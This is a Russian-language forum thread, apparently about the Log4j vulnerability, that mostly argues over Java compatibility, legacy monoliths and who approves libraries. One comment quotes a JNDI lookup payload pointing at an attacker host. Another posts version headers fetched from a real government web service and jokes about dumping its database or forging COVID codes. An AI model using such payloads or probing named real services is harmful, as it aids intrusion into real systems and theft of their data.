Мы 130 миллионов на провалившийся перевод потратили.

А дай ссылку на threat-report с такими сведениями.

Гадостью её делают всякие гадостные фреймворки, на которых пишутся приложения. Сам по себе Pure Java Core вполне неплох.

Ну камон, Java 6 - это 2006 год, систему делали и проектировали 15 лет назад. Тогда было нормально проектировать так, как будто изменений не существует. Это и сейчас нормально в том смысле, что распространено, но хотя бы считается плохим подходом

Когда я изучал джаву, когда она была уровня апплетов, я уже тогда понимал, что это будущее.

Это оказалось правдой.

Чувак, у нас есть архитектура. И она расширяема.

Только ты не найдёшь людей, которые бы сумеют запустить монолит Ява 6 на 11.

Если ты говоришь, что сможешь это сделать, то ты шарлатан из мира тырпрайза.

Только ты не найдёшь людей, которые бы сумеют запустить монолит Ява 6 на 11.

Просто надо перестать относиться к своему монолиту как к памятнику архитектуры во-первых. А во-вторых начинать не с поиска людей, которые будут зачем-то таскать этот монолит туда-сюда, а с поиска тех, кто может правильно ставить задачи.

Когда я изучал джаву, когда она была уровня апплетов, я уже тогда понимал, что это будущее.

Что подсказывало?

Тогда же изучал, помню сверхагрессивный маркетинг Sun несколько лет подряд, апплеты, которые работали просто отвратительно на железе тех лет: загрузка минимального апплета подвешивала систему целиком на десятки секунд или даже минуты, после чего на экране браузера появлялась криво работающая тормозящая серая какашка.

Я не был тогда «ценителем» языков (как не являюсь и сейчас), но для меня тогдашнего было очевидно: хочешь, чтобы программа работала быстро - C или C++. Хочешь, чтобы написать можно было быстро - Tcl или Perl (чуть позже, Python).

Java тогда не укладывалась вообще никуда. Я не понимал, зачем она нужна, как не понимаю и сейчас, если честно. Ещё напрягает и напрягала многословность, неужели нельзя было «современный» язык придумать более лаконичным?..

В жаве обратная совместимость. Например я юзаю драйвер оракл 9 написанный для жава 1.4 под жавой 17. Всё работает как часы.

Сразу видно знатока джава. У тебя какие проекты были? Интеграция с SAP, проекты для DAX, бундесбанка?

Не всем так везёт. Есть, например, некоторый софт, который запускается только в конкретной сборке ждк.

Жирный троллинг ведёте? Впрочем мне нравится стиль Лизы, продолжайте.

У тебя какие проекты были?

/me Подтаскивается с чашкой попкорна к монитору

В моём понимании. Как раз если отходить от крайностей (либо быстро либо удобно) то java вполне себе логична. Она шустрее Perl и Python, и не настолько технически зубодробительна как C или C++.

А вот многословность, это момент сложнее. Учитывая что большинство слов это названия переменных, методов и классов то возникает вопрос - а как можно писать большие системы с кучей сущностей, не прибегая к чёткому обозначению что есть что?

Или вы предлагаете сокращать всё и вся и довольствоваться названиями методов в стиле тыцПыц()?

Или вы предлагаете сокращать всё и вся и довольствоваться названиями методов в стиле тыцПыц()?

Нет, я просто помню, как простейшие задачи, типа прочитать и вывести файл, которые в других языках записывались одной строкой, в Java превращались в нечитаемое месиво всяких BufferedFileReader. Смутно помню, в конкретных названиях могу ошибиться.

Не хочу спорить и сравнивать, просто мне Java идиосинкратически никогда не нравилась. Я тоже честно верил в середине 90-х, что за ней будущее, и старался через силу использовать, но вообще не шло… Категорически не нравился опыт написания кода на Java, не нравилась её потрясающая тормознутость (сейчас, возможно, это сложно понять, но на обычном железе конца 90-х, начала 2000-х, жаба адски тормозила и лагала), не нравился тоталитаризм (один класс - один файл, и т.д. и т.п.), хотя я понимал, в общем, зачем это нужно. Короче, помучился пару лет, заставляя себя полюбить её, да и плюнул, и до сих пор терпеть не могу…

Хотя пользуюсь продуктами JetBrains, но они, подозреваю, наполовину на чём-то другом написаны, да и JRE у них давно своя, и года до 2010-2011 они тоже еле ворочались на обычном домашнем железе.

Отличная информация Спасибо.

Всякие были.

Это не софт, это баги. Баги надо исправлять, а не воссоздавать окружение, в котором эти баги воспроизводятся и называть это софтом.

Ты так говоришь, как будто ты стесняешься своего списочка из 2 проектов на свинге

У ФСС сервисы и утилиты на Java.

https://docs-test.fss.ru/eln.html -> https://eln-test.fss.ru/WSLnCryptoV20/FileOperationsLnService?WSDL

curl говорит, что в заголовках X-Powered-By: Servlet/4.0 JSP/2.3 (Payara Server 5.2020.4 #badassfish Java/AdoptOpenJDK/1.8)

прикольно если можно заслать больняк, который сольёт базу…

в библиотеке языка Java

Все ясно. Вопросов не имею.

Между тем GitHub включил режим «защита от школьников» и закрыл репы, которые могут быть использованы для проведения атак по этой дыре, например, упомянутый в новости JNDIExploit

Между тем GitHub включил режим «защита от школьников» и закрыл репы, которые могут быть использованы для проведения атак

Это fake news. Проверяй источники.

Я тут слышал, что многие java разрабы в день пишут от силы 10 строчек кода, остальное время проводят в бесконечных совещаниях и тим-билдингах. Надеюсь, ковид немного приземлил их

Кек, 10 строк это мало?
Сейчас бы строчками кода перформанс измерять.
Я за сегодня написал 3. Не считаю что это мало.

log4j2 кто-то использует? Всегда и везде использую log4j12 over slf4j.

Кстати, как они так умудрились обосраться? Это же java, какое нахрен произвольное исполнение? Или там был код в стиле if (logMsg.equals(«magic_string») { execute(code_from_logMsg); } ?

Update: пропустил это: ${jndi:ldap://hackerownserver.com/resource}", да я был прав, это вообще не уязвимость, это похоже на умышленный бэкдор. Библиотеку после такого надо выпиливать везде и бойкотировать, а не обновлять до 2.15

Зависит от того как написано приложение. В серьезном Ъ-ынтерпрайзе всегда используется какой-нибудь sun.misc или еще какая-нибудь хрень, которая в следующем релизе работает иначе или не работает вообще. Если оно просто не заработает, то считай, что сильно повезло, но обычно бывает иначе :)

По факту ссылка на JNDIExploit ведет в 404. Это не я придумал, это по факту так и есть, можешь проверить, кликнув по ссылке из новости.

я был в этом эпичном тредике

Вот вот. Если проект использует какой-нибудь spring-*, то это всё, говнокод на говнокоде и антипаттерном погоняет. Когда спрашиваешь почему так сделано - обычно отвечают, что тут так принято :)

У брандмауера под виндой и фаерволла iptables совершенно разный функционал. Вопрос: как назвать брандмауер так, чтобы отличать его от фаерволла?

Всегда и везде использую log4j12

У этой версии тоже не всё ок. Посмотри на отчет Atlassian для примера.

Там свой форк log4j12 в нём всё не так страшно, но если используется какой-то там Appender, то может быть проблема.

Какие требования у этой версии к версии Java?

Нам к счастью массово прикатило из репа автоматом, эксклюд руками доставили и норм

И чем же он совершенно разный?

Сам ищи, CVE-2021-4104

И заодно CVE-2019-17571 посмотри чтобы два раза не вставать

в серьезном энтерпрайзе всегда есть список Non-permitted technologies, за который отвечают контрестные люди в подчинении CIO/CTO, и если таковой список отсутствует, то это - несерьезный энтерпрайз, а его CIO - некопенгаген

В принципе, да, ты прав. Можешь взять, да переделать наш софт, никто не против.

в серьезном энтерпрайзе всегда есть

Сколько живу, столько и слышу сказки: «А вот где-то есть такое чудесное место, где всё делается по божественным правилам, записанным на скрижалях Кнутом, Виртом, etc, и все счастливы донельзя»…

Даже когда-то верил в эти сказки, пока не столкнулся с реальностью множество раз.

Каждую либу у CTO одобрять? Это где такая бюрократия ? Скажи, чтобы я туда на пушечный выстрел не приближался.

Сколько живу, столько и слышу сказки

это не сказки а реалии жизни

Каждую либу у CTO одобрять?

нет. СТО одобряет тех, кто следит за внутренней безопасностью, а те - одобряют каждую либу

Это где такая бюрократия ?

везде, где честно относятся к безопасности

Скажи, чтобы я туда на пушечный выстрел не приближался.

мы вас и близко на пушечный выстрел не подпустим

Ты передергиваешь и не следишь за контекстом дискуссии. Я начал не про безопасность, а про совместимость. Задача безопасников не либы одобрять, а следить за уязвимостями и вовремя тикеты на обновление версий вешать на команды. Если безопасники начинают одобрять либы, то они занимают не своим делом и такой конторы действительно следует держаться на пушечный выстрел.

Любой работодатель Европы. Я думаю, что в любом проекте любой фирмы тебе скажут, что нельзя просто так включать стильные модные молодежные библиотеки без согласования с сеньором или CTO.

Я через это прошел, меня очень вежливо попросили убрать зависимости.

Задача безопасников не либы одобрять

Вообще новые либы вносятся с согласования тима, если ты член этой команды.

Другое дело, если никто не хочет брать на себя ответственность за этот процесс.

Тогда просто говорят: ты можешь использовать те библиотеки, которые считаешь нужными.

Но это по мелочевке. Крупняк нужно обязательно согласовывать. Лично знаю уволенного человек, который притащил в проект первый ангуляр. Его за это уволили. Мне пришлось переписывать все с нуля на JQuery

Вообще новые либы вносятся с согласования тима, если ты член этой команды.

Именно, но никак не CTO или безопасников.

Если в тиме нет сеньора, то СТО

Какой-то вырожденный случай. Бывает скорее всего только в хипстерских стартапах-однодневках.

Кроме того, согласование уровня «ты нет против, чтобы я подключил эту либу» не отменяет ее аудит со стороны безопасников

Я не против, пусть аудируют им же надо чем-то заниматься, а не штаны просиживать. Обычно этот аудит происходит асинхронно без блокирования разработки.

прикольно если можно себе курокод выписать или бахнуть всю базу курокодов вообще